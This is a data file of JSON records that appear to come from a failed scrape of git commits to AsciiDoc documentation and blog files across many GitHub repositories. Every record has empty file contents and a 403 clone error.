{"commit":"c3927922b7c169b1bf973e7272832bed42e5d892","subject":"add note about support C* versions","message":"add note about support C* versions\n","repos":"objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"b318ed09897de505dc311f415ed2270167c39143","subject":"Added first skeleton of AS2 component docs","message":"Added first skeleton of AS2 component docs\n","repos":"DariusX\/camel,pax95\/camel,dmvolod\/camel,pmoerenhout\/camel,tadayosi\/camel,anoordover\/camel,tdiesler\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,objectiser\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,sverkera\/camel,cunningt\/camel,Fabryprog\/camel,mcollovati\/camel,CodeSmell\/camel,christophd\/camel,onders86\/camel,dmvolod\/camel,onders86\/camel,sverkera\/camel,christophd\/camel,CodeSmell\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,davidkarlsen\/camel,pmoerenhout\/camel,jamesnetherton\/camel,cunningt\/camel,akhettar\/camel,DariusX\/camel,zregvart\/camel,ullgren\/camel,gnodet\/camel,kevinearls\/camel,christophd\/camel,pax95\/camel,akhettar\/camel,Fabryprog\/camel,sverkera\/camel,dmvolod\/camel,apache\/camel,tdiesler\/camel,ullgren\/camel,mcollovati\/camel,jamesnetherton\/camel,apache\/camel,objectiser\/camel,nicolaferraro\/camel,alvinkwekel\/camel,mcollovati\/camel,Fabryprog\/camel,zregvart\/camel,tdiesler\/camel,tadayosi\/camel,kevinearls\/camel,anoordover\/camel,apache\/camel,alvinkwekel\/camel,ullgren\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,adessaigne\/camel,davidkarlsen\/camel,anoordover\/camel,onders86\/camel,gnodet\/camel,tadayosi\/camel,kevinearls\/camel,anoordover\/camel,tdiesler\/camel,davidkarlsen\/camel,objectiser\/camel,davidkarlsen\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,anoordover\/camel,adessaigne\/camel,christophd\/camel,anoordover\/camel,jamesnetherton\/camel,alvinkwekel\/camel,tdiesler\/camel,adessaigne\/camel,sverkera\/camel,akhettar\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,kevinearls\/camel,cunningt\/camel,DariusX\/camel,onders86\/camel,nicolaferraro\/camel,apache\/camel,kevinearls\/camel,adessaigne\/camel,mcollovati\/camel,anoordover\/camel,gnodet\/camel,tadayosi\/camel,kevinearls\/camel,akhettar\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,onders86\/camel,tadayosi\/camel,tadayosi\/camel,kevinearls\/camel,akhettar\/camel,pax95\/camel,pmoerenhout\/camel,zregvart\/camel","old_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"0c42df6874116444cedb8d943ce45ccebca4d2f1","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"27bba3b9858d82f6cedd29a20bb1f948c0b63265","subject":"Update 2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","message":"Update 2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","repos":"booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io","old_file":"_posts\/2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","new_file":"_posts\/2015-10-19-CHILD-LABOUR-SALUBRIOUS-OR-LUGUBRIOUS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/booleanbalaji\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ffd3d3f3397762f3af40dc31e8ef2783e4d720c","subject":"DOC initial version","message":"DOC initial version\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/build-great-native-cli-apps-in-java-with-graalvm-and-picocli.adoc","new_file":"docs\/build-great-native-cli-apps-in-java-with-graalvm-and-picocli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb2057d50912e815b63f56582a5705e326db1d08","subject":"Worked on fsevents disk log format documentation","message":"Worked on fsevents disk log format documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/MacOS File System Events Disk Log Stream format.asciidoc","new_file":"documentation\/MacOS File System Events Disk Log Stream format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17b29cf37284860706c4a262162a99287d772d61","subject":"Update 2015-06-03-PubPress-first-impression.adoc","message":"Update 2015-06-03-PubPress-first-impression.adoc","repos":"vvani06\/hubpress-test,vvani06\/hubpress-test,vvani06\/hubpress-test","old_file":"_posts\/2015-06-03-PubPress-first-impression.adoc","new_file":"_posts\/2015-06-03-PubPress-first-impression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vvani06\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f6646d815d996afa0187d38a00ca8684a414102","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a2e31d93b4af3c98342632f7086e94020342104","subject":"create post 3 Cool Gadgets Under $80","message":"create post 3 Cool Gadgets Under 
$80","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25f0660fd1f0557cde7c558fe2ddf6d424e18c0","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5637797444fb4a37759f81c4af75f4d7ace0d35c","subject":"BVAL-502 Add the master asciidoc file to the repository already, hardcoding expected file names","message":"BVAL-502 Add the master asciidoc file to the repository already, hardcoding expected file names\n","repos":"beanvalidation\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec","old_file":"sources\/master.asciidoc","new_file":"sources\/master.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beanvalidation\/beanvalidation-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7437f9413e85f239fe9d715209d5259a1e3946a4","subject":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","message":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6889473bf87194684340d11d99c9260c7c78387","subject":"y2b create post The Most Requested Smartphone I've NEVER Featured...","message":"y2b create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-24-The-Most-Requested-Smartphone-Ive-NEVER-Featured.adoc","new_file":"_posts\/2017-12-24-The-Most-Requested-Smartphone-Ive-NEVER-Featured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"73684dbd033770d32e571af0c12a06d07f78aa10","subject":"Stats corr","message":"Stats corr\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice.adoc","new_file":"Dev tools\/Exercice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b275f2d30c3cbe11319333a5de6cab0e3b1eb6f8","subject":"Check warns","message":"Check warns\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Eclipse.adoc","new_file":"Best practices\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe56d96295b18192c358e0822cc529778f632fee","subject":"Fixes #1429","message":"Fixes #1429\n","repos":"joshiste\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,sfat\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,sfat\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c11bd8cc9034f385ee63d50a48a6e922f94bfde","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2f090f2b9b429d915f65d9517f25aa83127a49a","subject":"Update 2017-05-08-Kritik-oder-Spiel.adoc","message":"Update 
2017-05-08-Kritik-oder-Spiel.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-08-Kritik-oder-Spiel.adoc","new_file":"_posts\/2017-05-08-Kritik-oder-Spiel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"373879e255c1bc85c18676a9ee62ce32b37721ed","subject":"Update 2016-05-31-Rinna-In-Pepper.adoc","message":"Update 2016-05-31-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f0086f27565b06f0a102b4c2966c26958f69c53","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8487a9202448b139da074a59195370470d0708b2","subject":"Update 2015-04-02-Test.adoc","message":"Update 2015-04-02-Test.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-04-02-Test.adoc","new_file":"_posts\/2015-04-02-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6bd6361dbcbfeb723e328bcbe310e7aac07a248","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba49e2d8161483a74d12e03c3a6f1e17911888ac","subject":"Update 2017-07-30-Carpets.adoc","message":"Update 2017-07-30-Carpets.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-07-30-Carpets.adoc","new_file":"_posts\/2017-07-30-Carpets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f4c381ded6f7a797cec246af77953bb357bdee99","subject":"Added current week04 notes... not ready for student view","message":"Added current week04 notes... not ready for student view\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b1cdc89bc0be8f4848b82a4df918757f060940e","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52c7de439b40763ae33f6996d46dbb04f6797b5b","subject":"Update 2016-02-06-Learning-resources-part-01.adoc","message":"Update 2016-02-06-Learning-resources-part-01.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2016-02-06-Learning-resources-part-01.adoc","new_file":"_posts\/2016-02-06-Learning-resources-part-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8095c67c6fa2301fd86a2bf87fe493213f333d5e","subject":"Update helper commands","message":"Update helper commands\n","repos":"asciidocfx\/AsciidocFX,asciidocfx\/AsciidocFX,asciidocfx\/AsciidocFX,asciidocfx\/AsciidocFX","old_file":"CMD_NOTES.adoc","new_file":"CMD_NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidocfx\/AsciidocFX.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3059d3714679c935a8189e35e9c044ab3c84f3aa","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53bd84abef2de4078a5783055e74a8b2ddf7521d","subject":"Update 2016-11-07-Monday-Morning.adoc","message":"Update 2016-11-07-Monday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday-Morning.adoc","new_file":"_posts\/2016-11-07-Monday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb0ee638293a63411f00dae4f825841c67b96827","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f00175ad71f1beda6d5113525570c1c01732c3bf","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3165e7eb3b5ff660d7c8c652dd61f5d6c7f957ad","subject":"Update 2015-09-18-Soyjoy.adoc","message":"Update 2015-09-18-Soyjoy.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Soyjoy.adoc","new_file":"_posts\/2015-09-18-Soyjoy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d1c0c1609c8642fa33fe0df62cd5a8acf3e6fc","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d5b8d50c25784fc0e13997ac1c887d1a708114","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0cba17d17197bce84ff50284d61f4128a69ad06","subject":"Add missing ascii doc file","message":"Add missing ascii doc file\n\n\nFormer-commit-id: 
f86431e1fb70db773eeb8da0287148414fc9fbb8","repos":"GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/geodesy-domain-model,GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/geodesy-domain-model","old_file":"src\/site\/asciidoc\/rest-upload-sopac-sitelog.adoc","new_file":"src\/site\/asciidoc\/rest-upload-sopac-sitelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GeoscienceAustralia\/geodesy-domain-model.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8c529d3cff9671de0d92ec6587b8b0c6fb229614","subject":"Regex: add a regex.asciidoc documentation page describing the syntax","message":"Regex: add a regex.asciidoc documentation page describing the syntax\n","repos":"casimir\/kakoune,danr\/kakoune,jjthrash\/kakoune,danr\/kakoune,Somasis\/kakoune,mawww\/kakoune,mawww\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,Somasis\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,alexherbo2\/kakoune,alexherbo2\/kakoune,danr\/kakoune,casimir\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,jkonecny12\/kakoune,lenormf\/kakoune,occivink\/kakoune,lenormf\/kakoune,casimir\/kakoune,Somasis\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,danr\/kakoune,mawww\/kakoune,occivink\/kakoune,lenormf\/kakoune","old_file":"doc\/manpages\/regex.asciidoc","new_file":"doc\/manpages\/regex.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjthrash\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"22c6f971a38bca50ad128fb1e716b7f7e714767c","subject":"y2b create post Catherine Deluxe Edition Unboxing (PS3) (Love Is Over)","message":"y2b create post Catherine Deluxe Edition Unboxing (PS3) (Love Is Over)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-11-Catherine-Deluxe-Edition-Unboxing-PS3-Love-Is-Over.adoc","new_file":"_posts\/2011-10-11-Catherine-Deluxe-Edition-Unboxing-PS3-Love-Is-Over.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2518827f22f6c44d60ae6f073bfd2195b45dc392","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
